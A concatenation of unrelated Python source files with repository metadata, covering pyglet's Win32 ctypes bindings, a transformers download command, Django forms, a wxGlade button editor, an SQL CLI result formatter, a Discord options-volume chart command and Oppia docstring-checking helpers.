                # Clear the thread's last-error value *before* the call so a
                # stale code from earlier work is not misattributed to `fn`.
                _SetLastError(0)
                result = fn(*args)
                err = _GetLastError()
                if err != 0:
                    # Log the Python call stack (minus this frame) plus the
                    # decoded system error message.
                    for entry in traceback.format_list(traceback.extract_stack()[:-1]):
                        _log_win32.write(entry)
                    print(format_error(err), file=_log_win32)
                return result
            return f
else:
DebugLibrary = lambda lib: lib
# Wrap each required system DLL; with debugging off DebugLibrary is a no-op.
_gdi32 = DebugLibrary(windll.gdi32)
_kernel32 = DebugLibrary(windll.kernel32)
_user32 = DebugLibrary(windll.user32)
_dwmapi = DebugLibrary(windll.dwmapi)
# _gdi32
# ctypes prototypes (restype/argtypes) for the GDI functions used by pyglet.
_gdi32.AddFontMemResourceEx.restype = HANDLE
_gdi32.AddFontMemResourceEx.argtypes = [PVOID, DWORD, PVOID, POINTER(DWORD)]
_gdi32.ChoosePixelFormat.restype = c_int
_gdi32.ChoosePixelFormat.argtypes = [HDC, POINTER(PIXELFORMATDESCRIPTOR)]
_gdi32.CreateBitmap.restype = HBITMAP
_gdi32.CreateBitmap.argtypes = [c_int, c_int, UINT, UINT, c_void_p]
_gdi32.CreateCompatibleDC.restype = HDC
_gdi32.CreateCompatibleDC.argtypes = [HDC]
_gdi32.CreateDIBitmap.restype = HBITMAP
_gdi32.CreateDIBitmap.argtypes = [HDC, POINTER(BITMAPINFOHEADER), DWORD, c_void_p, POINTER(BITMAPINFO), UINT]
_gdi32.CreateDIBSection.restype = HBITMAP
_gdi32.CreateDIBSection.argtypes = [HDC, c_void_p, UINT, c_void_p, HANDLE, DWORD] # POINTER(BITMAPINFO)
_gdi32.CreateFontIndirectA.restype = HFONT
_gdi32.CreateFontIndirectA.argtypes = [POINTER(LOGFONT)]
_gdi32.DeleteDC.restype = BOOL
_gdi32.DeleteDC.argtypes = [HDC]
_gdi32.DeleteObject.restype = BOOL
_gdi32.DeleteObject.argtypes = [HGDIOBJ]
_gdi32.DescribePixelFormat.restype = c_int
_gdi32.DescribePixelFormat.argtypes = [HDC, c_int, UINT, POINTER(PIXELFORMATDESCRIPTOR)]
_gdi32.ExtTextOutA.restype = BOOL
_gdi32.ExtTextOutA.argtypes = [HDC, c_int, c_int, UINT, LPRECT, c_char_p, UINT, POINTER(INT)]
_gdi32.GdiFlush.restype = BOOL
_gdi32.GdiFlush.argtypes = []
_gdi32.GetCharABCWidthsW.restype = BOOL
_gdi32.GetCharABCWidthsW.argtypes = [HDC, UINT, UINT, POINTER(ABC)]
_gdi32.GetCharWidth32W.restype = BOOL
_gdi32.GetCharWidth32W.argtypes = [HDC, UINT, UINT, POINTER(INT)]
_gdi32.GetStockObject.restype = HGDIOBJ
_gdi32.GetStockObject.argtypes = [c_int]
_gdi32.GetTextMetricsA.restype = BOOL
_gdi32.GetTextMetricsA.argtypes = [HDC, POINTER(TEXTMETRIC)]
_gdi32.SelectObject.restype = HGDIOBJ
_gdi32.SelectObject.argtypes = [HDC, HGDIOBJ]
_gdi32.SetBkColor.restype = COLORREF
_gdi32.SetBkColor.argtypes = [HDC, COLORREF]
_gdi32.SetBkMode.restype = c_int
_gdi32.SetBkMode.argtypes = [HDC, c_int]
_gdi32.SetPixelFormat.restype = BOOL
_gdi32.SetPixelFormat.argtypes = [HDC, c_int, POINTER(PIXELFORMATDESCRIPTOR)]
_gdi32.SetTextColor.restype = COLORREF
_gdi32.SetTextColor.argtypes = [HDC, COLORREF]
_gdi32.SwapBuffers.restype = BOOL
_gdi32.SwapBuffers.argtypes = [HDC]
# _kernel32 prototypes (handles, events, waitable timers, global memory).
_kernel32.CloseHandle.restype = BOOL
_kernel32.CloseHandle.argtypes = [HANDLE]
_kernel32.CreateEventW.restype = HANDLE
_kernel32.CreateEventW.argtypes = [POINTER(SECURITY_ATTRIBUTES), BOOL, BOOL, c_wchar_p]
_kernel32.CreateWaitableTimerA.restype = HANDLE
_kernel32.CreateWaitableTimerA.argtypes = [POINTER(SECURITY_ATTRIBUTES), BOOL, c_char_p]
_kernel32.GetCurrentThreadId.restype = DWORD
_kernel32.GetCurrentThreadId.argtypes = []
_kernel32.GetModuleHandleW.restype = HMODULE
_kernel32.GetModuleHandleW.argtypes = [c_wchar_p]
_kernel32.GlobalAlloc.restype = HGLOBAL
_kernel32.GlobalAlloc.argtypes = [UINT, c_size_t]
_kernel32.GlobalLock.restype = LPVOID
_kernel32.GlobalLock.argtypes = [HGLOBAL]
_kernel32.GlobalUnlock.restype = BOOL
_kernel32.GlobalUnlock.argtypes = [HGLOBAL]
_kernel32.SetLastError.restype = DWORD
# NOTE(review): Win32 SetLastError(DWORD) returns void -- this prototype looks
# inverted (DWORD result, no arguments); confirm against the SDK headers.
_kernel32.SetLastError.argtypes = []
_kernel32.SetWaitableTimer.restype = BOOL
_kernel32.SetWaitableTimer.argtypes = [HANDLE, POINTER(LARGE_INTEGER), LONG, LPVOID, LPVOID, BOOL] # TIMERAPCPROC
_kernel32.WaitForSingleObject.restype = DWORD
_kernel32.WaitForSingleObject.argtypes = [HANDLE, DWORD]
# _user32 prototypes (windows, messages, cursor, display settings, hotkeys).
_user32.AdjustWindowRectEx.restype = BOOL
_user32.AdjustWindowRectEx.argtypes = [LPRECT, DWORD, BOOL, DWORD]
_user32.ChangeDisplaySettingsExW.restype = LONG
_user32.ChangeDisplaySettingsExW.argtypes = [c_wchar_p, POINTER(DEVMODE), HWND, DWORD, LPVOID]
_user32.ClientToScreen.restype = BOOL
_user32.ClientToScreen.argtypes = [HWND, LPPOINT]
_user32.ClipCursor.restype = BOOL
_user32.ClipCursor.argtypes = [LPRECT]
_user32.CreateIconIndirect.restype = HICON
_user32.CreateIconIndirect.argtypes = [POINTER(ICONINFO)]
_user32.CreateWindowExW.restype = HWND
_user32.CreateWindowExW.argtypes = [DWORD, c_wchar_p, c_wchar_p, DWORD, c_int, c_int, c_int, c_int, HWND, HMENU, HINSTANCE, LPVOID]
_user32.DefWindowProcW.restype = LRESULT
_user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM]
_user32.DestroyWindow.restype = BOOL
_user32.DestroyWindow.argtypes = [HWND]
_user32.DispatchMessageW.restype = LRESULT
_user32.DispatchMessageW.argtypes = [LPMSG]
_user32.EnumDisplayMonitors.restype = BOOL
_user32.EnumDisplayMonitors.argtypes = [HDC, LPRECT, MONITORENUMPROC, LPARAM]
_user32.EnumDisplaySettingsW.restype = BOOL
_user32.EnumDisplaySettingsW.argtypes = [c_wchar_p, DWORD, POINTER(DEVMODE)]
_user32.FillRect.restype = c_int
_user32.FillRect.argtypes = [HDC, LPRECT, HBRUSH]
_user32.GetClientRect.restype = BOOL
_user32.GetClientRect.argtypes = [HWND, LPRECT]
_user32.GetCursorPos.restype = BOOL
_user32.GetCursorPos.argtypes = [LPPOINT]
# workaround for win 64-bit, see issue #664
_user32.GetDC.restype = c_void_p # HDC
_user32.GetDC.argtypes = [c_void_p] # [HWND]
_user32.GetDesktopWindow.restype = HWND
_user32.GetDesktopWindow.argtypes = []
_user32.GetKeyState.restype = c_short
_user32.GetKeyState.argtypes = [c_int]
_user32.GetMessageW.restype = BOOL
_user32.GetMessageW.argtypes = [LPMSG, HWND, UINT, UINT]
_user32.GetMonitorInfoW.restype = BOOL
_user32.GetMonitorInfoW.argtypes = [HMONITOR, POINTER(MONITORINFOEX)]
_user32.GetQueueStatus.restype = DWORD
_user32.GetQueueStatus.argtypes = [UINT]
_user32.GetSystemMetrics.restype = c_int
_user32.GetSystemMetrics.argtypes = [c_int]
_user32.LoadCursorW.restype = HCURSOR
_user32.LoadCursorW.argtypes = [HINSTANCE, c_wchar_p]
_user32.LoadIconW.restype = HICON
_user32.LoadIconW.argtypes = [HINSTANCE, c_wchar_p]
_user32.MapVirtualKeyW.restype = UINT
_user32.MapVirtualKeyW.argtypes = [UINT, UINT]
_user32.MapWindowPoints.restype = c_int
_user32.MapWindowPoints.argtypes = [HWND, HWND, c_void_p, UINT] # HWND, HWND, LPPOINT, UINT
_user32.MsgWaitForMultipleObjects.restype = DWORD
_user32.MsgWaitForMultipleObjects.argtypes = [DWORD, POINTER(HANDLE), BOOL, DWORD, DWORD]
_user32.PeekMessageW.restype = BOOL
_user32.PeekMessageW.argtypes = [LPMSG, HWND, UINT, UINT, UINT]
_user32.PostThreadMessageW.restype = BOOL
_user32.PostThreadMessageW.argtypes = [DWORD, UINT, WPARAM, LPARAM]
_user32.RegisterClassW.restype = ATOM
_user32.RegisterClassW.argtypes = [POINTER(WNDCLASS)]
_user32.RegisterHotKey.restype = BOOL
_user32.RegisterHotKey.argtypes = [HWND, c_int, UINT, UINT]
_user32.ReleaseCapture.restype = BOOL
_user32.ReleaseCapture.argtypes = []
# workaround for win 64-bit, see issue #664
_user32.ReleaseDC.restype = c_int32 # c_int
_user32.ReleaseDC.argtypes = [c_void_p, c_void_p] # [HWND, HDC]
_user32.ScreenToClient.restype = BOOL
_user32.ScreenToClient.argtypes = [HWND, LPPOINT]
_user32.SetCapture.restype = HWND
_user32.SetCapture.argtypes = [HWND]
_user32.SetClassLongW.restype = DWORD
_user32.SetClassLongW.argtypes = [HWND, c_int, LONG]
# SetClassLongPtrW only exists on 64-bit Windows; fall back to SetClassLongW.
if IS64:
    _user32.SetClassLongPtrW.restype = ULONG
    _user32.SetClassLongPtrW.argtypes = [HWND, c_int, LONG_PTR]
else:
    _user32.SetClassLongPtrW = _user32.SetClassLongW
_user32.SetCursor.restype = HCURSOR
_user32.SetCursor.argtypes = [HCURSOR]
_user32.SetCursorPos.restype = BOOL
_user32.SetCursorPos.argtypes = [c_int, c_int]
_user32.SetFocus.restype = HWND
_user32.SetFocus.argtypes = [HWND]
_user32.SetForegroundWindow.restype = BOOL
_user32.SetForegroundWindow.argtypes = [HWND]
_user32.SetTimer.restype = UINT_PTR
_user32.SetTimer.argtypes = [HWND, UINT_PTR, UINT, TIMERPROC]
_user32.SetWindowLongW.restype = LONG
_user32.SetWindowLongW.argtypes = [HWND, c_int, LONG]
_user32.SetWindowPos.restype = BOOL
_user32.SetWindowPos.argtypes = [HWND, HWND, c_int, c_int, c_int, c_int, UINT]
_user32.SetWindowTextW.restype = BOOL
_user32.SetWindowTextW.argtypes = [HWND, c_wchar_p]
_user32.ShowCursor.restype = c_int
_user32.ShowCursor.argtypes = [BOOL]
_user32.ShowWindow.restype = BOOL
_user32.ShowWindow.argtypes = [HWND, c_int]
_user32.TrackMouseEvent.restype = BOOL
_user32.TrackMouseEvent.argtypes = [POINTER(TRACKMOUSEEVENT)]
_user32.TranslateMessage.restype = BOOL
_user32.TranslateMessage.argtypes = [LPMSG]
_user32.UnregisterClassW.restype = BOOL
_user32.UnregisterClassW.argtypes = [c_wchar_p, HINSTANCE]
_user32.UnregisterHotKey.restype = BOOL
_user32.UnregisterHotKey.argtypes = [HWND, c_int]
# Raw inputs
_user32.RegisterRawInputDevices.restype = BOOL
_user32.RegisterRawInputDevices.argtypes = [PCRAWINPUTDEVICE, UINT, UINT]
_user32.GetRawInputData.restype = UINT
_user32.GetRawInputData.argtypes = [HRAWINPUT, UINT, LPVOID, PUINT, UINT]
#dwmapi
_dwmapi.DwmIsCompositionEnabled.restype = c_int
_dwmapi.DwmIsCompositionEnabled.argtypes = [POINTER(INT)]
_dwmapi.DwmFlush.restype = c_int
_dwmapi.DwmFlush.argtypes = []
acfb3d6414beb649815643e690ffc9e3f91790d6 | 147 | py | Python | 4444.py | JoshChand/10IST | 1ed0c45bd6c41fb8fe825591826f08cb5a801012 | [
"MIT"
] | null | null | null | 4444.py | JoshChand/10IST | 1ed0c45bd6c41fb8fe825591826f08cb5a801012 | [
"MIT"
] | null | null | null | 4444.py | JoshChand/10IST | 1ed0c45bd6c41fb8fe825591826f08cb5a801012 | [
"MIT"
] | null | null | null | import math
def areaofcircle(r):
    """Return the area of a circle of radius ``r``; also prints a trace line."""
    circle_area = math.pi * r * r
    print("Returning area to main program. ")
    return circle_area
radius =float(
| 18.375 | 46 | 0.612245 |
acfb3ecac9304995b670706d6f54097a16b77746 | 322 | py | Python | tests/test_base.py | StevenKangWei/learning-algorithm | fa2a32c3a650f1a95c75f82750b07de444c4bbfa | [
"MIT"
] | null | null | null | tests/test_base.py | StevenKangWei/learning-algorithm | fa2a32c3a650f1a95c75f82750b07de444c4bbfa | [
"MIT"
] | null | null | null | tests/test_base.py | StevenKangWei/learning-algorithm | fa2a32c3a650f1a95c75f82750b07de444c4bbfa | [
"MIT"
] | null | null | null | # coding=utf-8
import os
import sys
import unittest
dirname = os.path.dirname(os.path.abspath(__file__))
project = os.path.dirname(dirname)
if project not in sys.path:
sys.path.insert(0, project)
class BaseTestCase(unittest.TestCase):
@staticmethod
def main():
return unittest.main(failfast=True)
| 17.888889 | 52 | 0.723602 |
acfb3eeb927f6d2d30e8fb49d00183fc53de8770 | 1,272 | py | Python | src/transformers/commands/download.py | ari-holtzman/transformers | 8725c545e8feeecdcee0ad92ca1d80cee8f0c6e4 | [
"Apache-2.0"
] | 5,129 | 2019-09-30T11:21:03.000Z | 2022-03-31T22:35:12.000Z | src/transformers/commands/download.py | hmason/transformers | ab90353f1abfd15f8d21f99395658d060679a08c | [
"Apache-2.0"
] | 604 | 2019-10-05T00:39:46.000Z | 2022-03-31T11:12:07.000Z | src/transformers/commands/download.py | hmason/transformers | ab90353f1abfd15f8d21f99395658d060679a08c | [
"Apache-2.0"
] | 1,034 | 2019-09-30T15:01:32.000Z | 2022-03-31T06:14:50.000Z | from argparse import ArgumentParser
from transformers.commands import BaseTransformersCLICommand
def download_command_factory(args):
return DownloadCommand(args.model, args.cache_dir, args.force)
class DownloadCommand(BaseTransformersCLICommand):
@staticmethod
def register_subcommand(parser: ArgumentParser):
download_parser = parser.add_parser("download")
download_parser.add_argument(
"--cache-dir", type=str, default=None, help="Path to location to store the models"
)
download_parser.add_argument(
"--force", action="store_true", help="Force the model to be download even if already in cache-dir"
)
download_parser.add_argument("model", type=str, help="Name of the model to download")
download_parser.set_defaults(func=download_command_factory)
def __init__(self, model: str, cache: str, force: bool):
self._model = model
self._cache = cache
self._force = force
def run(self):
from transformers import AutoModel, AutoTokenizer
AutoModel.from_pretrained(self._model, cache_dir=self._cache, force_download=self._force)
AutoTokenizer.from_pretrained(self._model, cache_dir=self._cache, force_download=self._force)
| 38.545455 | 110 | 0.720126 |
acfb3f3555575b81f5d5c8f1dbe8497ad058d625 | 615 | py | Python | pastry_shop/shop/forms.py | Raekker/pastry-shop | 27e4e98594c57cbe5825a6571c6f93ad97dc1eb3 | [
"MIT"
] | null | null | null | pastry_shop/shop/forms.py | Raekker/pastry-shop | 27e4e98594c57cbe5825a6571c6f93ad97dc1eb3 | [
"MIT"
] | null | null | null | pastry_shop/shop/forms.py | Raekker/pastry-shop | 27e4e98594c57cbe5825a6571c6f93ad97dc1eb3 | [
"MIT"
] | null | null | null | from django import forms
from pastry_shop.shop.models import Product, ProductCart
class ProductForm(forms.ModelForm):
amount = forms.IntegerField(min_value=1)
price = forms.DecimalField(min_value=0.01, max_digits=7, decimal_places=2)
class Meta:
model = Product
fields = "__all__"
widgets = {"categories": forms.CheckboxSelectMultiple}
class CartProductAddForm(forms.Form):
amount = forms.IntegerField(min_value=1)
class ShopProductAddForm(forms.Form):
product = forms.ModelChoiceField(queryset=Product.objects.all())
amount = forms.IntegerField(min_value=1)
| 26.73913 | 78 | 0.738211 |
acfb3fbd4fce83b48b3bec2d780d619d94ff63ca | 5,418 | py | Python | wxPython/wxGlade-0.9.1/widgets/button/button.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | null | null | null | wxPython/wxGlade-0.9.1/widgets/button/button.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | null | null | null | wxPython/wxGlade-0.9.1/widgets/button/button.py | DarkShadow4/python | 4cd94e0cf53ee06c9c31e9272572ca9656697c30 | [
"MIT"
] | 1 | 2020-08-19T17:25:22.000Z | 2020-08-19T17:25:22.000Z | """
wxButton objects
@copyright: 2002-2007 Alberto Griggio
@copyright: 2014-2016 Carsten Grohmann
@copyright: 2016 Dietmar Schwertberger
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
import wx
import config, common, compat
from edit_windows import ManagedBase, EditStylesMixin
from tree import Node
import new_properties as np
from .button_stockitems import *
from gui_mixins import BitmapMixin
class EditButton(ManagedBase, EditStylesMixin, BitmapMixin):
    "Class to handle wxButton objects"
    # All standard stock-item ids that can be chosen instead of a free-form label.
    STOCKITEMS = sorted( ButtonStockItems.stock_ids.keys())
    _PROPERTIES = ["Widget", "label", "stockitem",
                   "bitmap", "disabled_bitmap", "pressed_bitmap", "current_bitmap", "focus_bitmap",
                   "default", "style"]
    PROPERTIES = ManagedBase.PROPERTIES + _PROPERTIES + ManagedBase.EXTRA_PROPERTIES
    _PROPERTY_HELP = {"default":"This sets the button to be the default item for the panel or dialog box.",
                      "stockitem":"Standard IDs for button identifiers"}
    def __init__(self, name, parent, id, label, sizer, pos):
        # Initialise parent classes
        ManagedBase.__init__(self, name, 'wxButton', parent, id, sizer, pos)
        EditStylesMixin.__init__(self)
        BitmapMixin.__init__(self)
        # initialise instance properties
        self.label = np.TextProperty(label, default_value="", multiline="grow")
        self.default = np.CheckBoxProperty(False, default_value=False)
        self.stockitem = np.ComboBoxPropertyD(self.STOCKITEMS[0], choices=self.STOCKITEMS)
        # the bitmap properties are only offered for wx version 3.0 and later
        self.bitmap = np.BitmapPropertyD(min_version=(3,0))
        self.disabled_bitmap = np.BitmapPropertyD(min_version=(3,0))
        self.pressed_bitmap = np.BitmapPropertyD(min_version=(3,0))
        self.current_bitmap = np.BitmapPropertyD(min_version=(3,0))
        self.focus_bitmap = np.BitmapPropertyD(min_version=(3,0))
    def create_widget(self):
        "Create the preview wx.Button; an active stock item overrides the label."
        stockitem_p = self.properties["stockitem"]
        if stockitem_p.is_active():
            label = ButtonStockItems.stock_ids[stockitem_p.get()]
        else:
            label = self.label
        self.widget = wx.Button(self.parent.widget, self.id, label, style=self.style)
        if compat.IS_PHOENIX:
            self._set_preview_bitmaps()
    def properties_changed(self, modified=None):
        "update label (and size if label/stockitem have changed)"
        # modified is None on initial creation; treat that as "everything changed".
        label_modified = not modified or "label" in modified
        if not modified or "stockitem" in modified:
            # if stockitem is set, label needs to be deactivated and window id is wxID_...
            if self.properties["stockitem"].is_active():
                self.properties["label"].set_blocked(True)
                new_id = "wxID_" + self.stockitem
                self.properties["id"].set( new_id, deactivate=True )
                #self.properties["id"].default_value = new_id # avoid this value to be written to XML
                l = ButtonStockItems.stock_ids[self.stockitem]
                if self.widget:
                    self.widget.SetLabel(l)
            else:
                self.properties["label"].set_blocked(False)
                #self.properties["id"].default_value = "wxID_ANY"
                label_modified = True
        if label_modified and self.properties["label"].is_active():
            if self.widget:
                self.widget.SetLabel(self.label)
        # label_modified is True whenever modified is None, so the short-circuit
        # below never evaluates '"name" in None'.
        if label_modified or "name" in modified:
            common.app_tree.refresh(self.node, refresh_label=True)
        # let the mixins and base class process their own properties
        BitmapMixin._properties_changed(self, modified)
        self._set_widget_best_size()
        EditStylesMixin.properties_changed(self, modified)
        ManagedBase.properties_changed(self, modified)
def builder(parent, sizer, pos, number=[1]):
    "factory function for EditButton objects"
    # NOTE: the mutable default 'number' is deliberate -- it is a persistent
    # counter shared across calls so each new button gets a unique name.
    name = u'button_%d' % number[0]
    while common.app_tree.has_name(name):
        number[0] += 1
        name = u'button_%d' % number[0]
    with parent.frozen():
        button = EditButton(name, parent, wx.NewId(), name, sizer, pos)
        button.properties["style"].set_to_default()
        button.check_defaults()
        node = Node(button)
        button.node = node
        if parent.widget: button.create()
    # insert into the application tree at the requested sizer slot
    common.app_tree.insert(node, sizer.node, pos-1)
def xml_builder(attrs, parent, sizer, sizeritem, pos=None):
    "factory to build EditButton objects from a XML file"
    from xml_parse import XmlParsingError
    try:
        name = attrs['name']
    except KeyError:
        raise XmlParsingError(_("'name' attribute missing"))
    if sizer is None or sizeritem is None:
        raise XmlParsingError(_("sizer or sizeritem object cannot be None"))
    # the label is restored later from the XML properties, hence ''
    button = EditButton(name, parent, wx.NewId(), '', sizer, pos)
    #sizer.set_item(button.pos, proportion=sizeritem.proportion, span=sizeritem.span, flag=sizeritem.flag, border=sizeritem.border)
    node = Node(button)
    button.node = node
    # append when no position was given, otherwise insert at the slot
    if pos is None:
        common.app_tree.add(node, sizer.node)
    else:
        common.app_tree.insert(node, sizer.node, pos-1)
    return button
def initialize():
    "initialization function for the module: registers the factories and returns a palette button"
    common.widgets['EditButton'] = builder
    common.widgets_from_xml['EditButton'] = xml_builder
    return common.make_object_button('EditButton', 'button.xpm')
| 40.133333 | 131 | 0.665559 |
acfb401fe27b05b2b4cfcfcf221d80b566442b9c | 3,843 | py | Python | sql-cli/src/odfe_sql_cli/formatter.py | pakio/sql | cc9cc58d2aaca7ff7deda9d339ca8e2f769e022f | [
"Apache-2.0"
] | 12 | 2020-05-14T19:01:55.000Z | 2021-01-23T21:00:07.000Z | sql-cli/src/odfe_sql_cli/formatter.py | pakio/sql | cc9cc58d2aaca7ff7deda9d339ca8e2f769e022f | [
"Apache-2.0"
] | 62 | 2020-10-05T17:30:17.000Z | 2021-04-03T01:07:07.000Z | sql-cli/src/odfe_sql_cli/formatter.py | pakio/sql | cc9cc58d2aaca7ff7deda9d339ca8e2f769e022f | [
"Apache-2.0"
] | 6 | 2020-05-09T22:12:52.000Z | 2020-11-16T10:03:56.000Z | """
Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License").
You may not use this file except in compliance with the License.
A copy of the License is located at
http://www.apache.org/licenses/LICENSE-2.0
or in the "license" file accompanying this file. This file is distributed
on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the License for the specific language governing
permissions and limitations under the License.
"""
import click
import itertools
from cli_helpers.tabular_output import TabularOutputFormatter
from cli_helpers.tabular_output.preprocessors import format_numbers
click.disable_unicode_literals_warning = True
class Formatter:
"""Formatter instance is used to format the data retrieved from Elasticsearch."""
def __init__(self, settings):
"""A formatter can be customized by passing settings as a parameter."""
self.settings = settings
self.table_format = "vertical" if self.settings.is_vertical else self.settings.table_format
self.max_width = self.settings.max_width
def format_array(val):
if val is None:
return self.settings.missingval
if not isinstance(val, list):
return val
return "[" + ",".join(str(format_array(e)) for e in val) + "]"
def format_arrays(field_data, headers, **_):
field_data = list(field_data)
for row in field_data:
row[:] = [format_array(val) if isinstance(val, list) else val for val in row]
return field_data, headers
self.output_kwargs = {
"sep_title": "RECORD {n}",
"sep_character": "-",
"sep_length": (1, 25),
"missing_value": self.settings.missingval,
"preprocessors": (format_numbers, format_arrays),
"disable_numparse": True,
"preserve_whitespace": True,
"style": self.settings.style_output,
}
def format_output(self, data):
"""Format data.
:param data: raw data get from ES
:return: formatted output, it's either table or vertical format
"""
formatter = TabularOutputFormatter(format_name=self.table_format)
# parse response data
datarows = data["datarows"]
schema = data["schema"]
total_hits = data["total"]
cur_size = data["size"]
# unused data for now,
fields = []
types = []
# get header and type as lists, for future usage
for i in schema:
fields.append(i["name"])
types.append(i["type"])
output = formatter.format_output(datarows, fields, **self.output_kwargs)
output_message = "fetched rows / total rows = %d/%d" % (cur_size, total_hits)
# Open Distro for ES sql has a restriction of retrieving 200 rows of data by default
if total_hits > 200 == cur_size:
output_message += "\n" + "Attention: Use LIMIT keyword when retrieving more than 200 rows of data"
# check width overflow, change format_name for better visual effect
first_line = next(output)
output = itertools.chain([output_message], [first_line], output)
if len(first_line) > self.max_width:
click.secho(message="Output longer than terminal width", fg="red")
if click.confirm("Do you want to display data vertically for better visual effect?"):
output = formatter.format_output(datarows, fields, format_name="vertical", **self.output_kwargs)
output = itertools.chain([output_message], output)
# TODO: if decided to add row_limit. Refer to pgcli -> main -> line 866.
return output
| 38.43 | 112 | 0.64611 |
acfb4109f206ba41df71b1c919f58c2f14e16a12 | 3,070 | py | Python | discordbot/stocks/options/vol.py | greggorrell/GamestonkTerminal | caa2c88c1259967b55a7565c7ce5fb1014f39e68 | [
"MIT"
] | 1 | 2021-12-31T04:10:42.000Z | 2021-12-31T04:10:42.000Z | discordbot/stocks/options/vol.py | greggorrell/GamestonkTerminal | caa2c88c1259967b55a7565c7ce5fb1014f39e68 | [
"MIT"
] | null | null | null | discordbot/stocks/options/vol.py | greggorrell/GamestonkTerminal | caa2c88c1259967b55a7565c7ce5fb1014f39e68 | [
"MIT"
] | null | null | null | import os
import discord
import matplotlib.pyplot as plt
import discordbot.config_discordbot as cfg
from gamestonk_terminal import config_plot as cfp
from gamestonk_terminal.helper_funcs import plot_autoscale
from gamestonk_terminal.stocks.options import yfinance_model
async def vol_command(
ctx,
ticker: str = None,
expiry: str = "",
min_sp: float = None,
max_sp: float = None,
):
"""Options VOL"""
try:
# Debug
if cfg.DEBUG:
print(f"!stocks.opt.vol {ticker} {expiry} {min_sp} {max_sp}")
# Check for argument
if ticker is None:
raise Exception("Stock ticker is required")
dates = yfinance_model.option_expirations(ticker)
if not dates:
raise Exception("Stock ticker is invalid")
options = yfinance_model.get_option_chain(ticker, expiry)
current_price = yfinance_model.get_price(ticker)
if min_sp is None:
min_strike = 0.75 * current_price
else:
min_strike = min_sp
if max_sp is None:
max_strike = 1.90 * current_price
else:
max_strike = max_sp
calls = options.calls
puts = options.puts
call_v = calls.set_index("strike")["volume"] / 1000
put_v = puts.set_index("strike")["volume"] / 1000
plt.style.use("seaborn")
fig, ax = plt.subplots(figsize=plot_autoscale(), dpi=cfp.PLOT_DPI)
put_v.plot(
x="strike",
y="volume",
label="Puts",
ax=ax,
marker="o",
ls="-",
c="r",
)
call_v.plot(
x="strike",
y="volume",
label="Calls",
ax=ax,
marker="o",
ls="-",
c="g",
)
ax.axvline(
current_price, lw=2, c="k", ls="--", label="Current Price", alpha=0.7
)
ax.grid("on")
ax.set_xlabel("Strike Price")
ax.set_ylabel("Volume (1k) ")
ax.set_xlim(min_strike, max_strike)
ax.set_title(f"Volume for {ticker.upper()} expiring {expiry}")
plt.legend(loc=0)
fig.tight_layout(pad=1)
imagefile = "opt_vol.png"
plt.savefig("opt_vol.png")
image = discord.File(imagefile)
if cfg.DEBUG:
print(f"Image: {imagefile}")
title = " " + ticker.upper() + " Options: Volume"
embed = discord.Embed(title=title, colour=cfg.COLOR)
embed.set_image(url="attachment://opt_vol.png")
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
os.remove("opt_vol.png")
await ctx.send(embed=embed, file=image)
except Exception as e:
embed = discord.Embed(
title="ERROR Options: Volume",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed)
| 26.929825 | 81 | 0.55342 |
acfb416aae0fb7f8b804942f1a8cb4c7b6facb07 | 10,500 | py | Python | scripts/docstrings_checker.py | gurungrahul2/oppia | d4a4df42befee6b95a2d23df841a429bf433de2e | [
"Apache-2.0"
] | null | null | null | scripts/docstrings_checker.py | gurungrahul2/oppia | d4a4df42befee6b95a2d23df841a429bf433de2e | [
"Apache-2.0"
] | null | null | null | scripts/docstrings_checker.py | gurungrahul2/oppia | d4a4df42befee6b95a2d23df841a429bf433de2e | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility methods for docstring checking."""
import ast
import os
import re
import sys
# Make the vendored pylint (under oppia_tools, relative to the current working
# directory) importable before the astroid/pylint imports below.
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PYLINT_PATH = os.path.join(_PARENT_DIR, 'oppia_tools', 'pylint-1.8.4')
sys.path.insert(0, _PYLINT_PATH)
# pylint: disable=wrong-import-position
import astroid # isort:skip
from pylint.checkers import utils # isort:skip
from pylint.extensions import _check_docs_utils # isort:skip
# pylint: enable=wrong-import-position
def space_indentation(s):
    """The number of leading spaces in a string.

    Only literal space characters count; a leading tab stops the count.

    Args:
        s: str. The input string.

    Returns:
        int. The number of leading spaces.
    """
    count = 0
    for char in s:
        if char != ' ':
            break
        count += 1
    return count
def get_setters_property_name(node):
    """Get the name of the property that the given node is a setter for.

    Args:
        node: str. The node to get the property name for.

    Returns:
        str|None. The name of the property that the node is a setter for,
            or None if one could not be found.
    """
    decorators = node.decorators.nodes if node.decorators else []
    for decorator in decorators:
        # Look for an ``@<name>.setter`` decorator on the node.
        is_setter_decorator = (
            isinstance(decorator, astroid.Attribute)
            and decorator.attrname == 'setter'
            and isinstance(decorator.expr, astroid.Name))
        if is_setter_decorator:
            return decorator.expr.name
    return None
def get_setters_property(node):
    """Get the property node for the given setter node.

    Args:
        node: astroid.FunctionDef. The node to get the property for.

    Returns:
        astroid.FunctionDef|None. The node relating to the property of
            the given setter node, or None if one could not be found.
    """
    property_name = get_setters_property_name(node)
    class_node = utils.node_frame_class(node)
    if not (property_name and class_node):
        return None
    # Return the first same-named class attribute decorated with @property.
    for class_attr in class_node.getattr(node.name):
        if utils.decorated_with_property(class_attr):
            return class_attr
    return None
def returns_something(return_node):
    """Check if a return node returns a value other than None.

    Args:
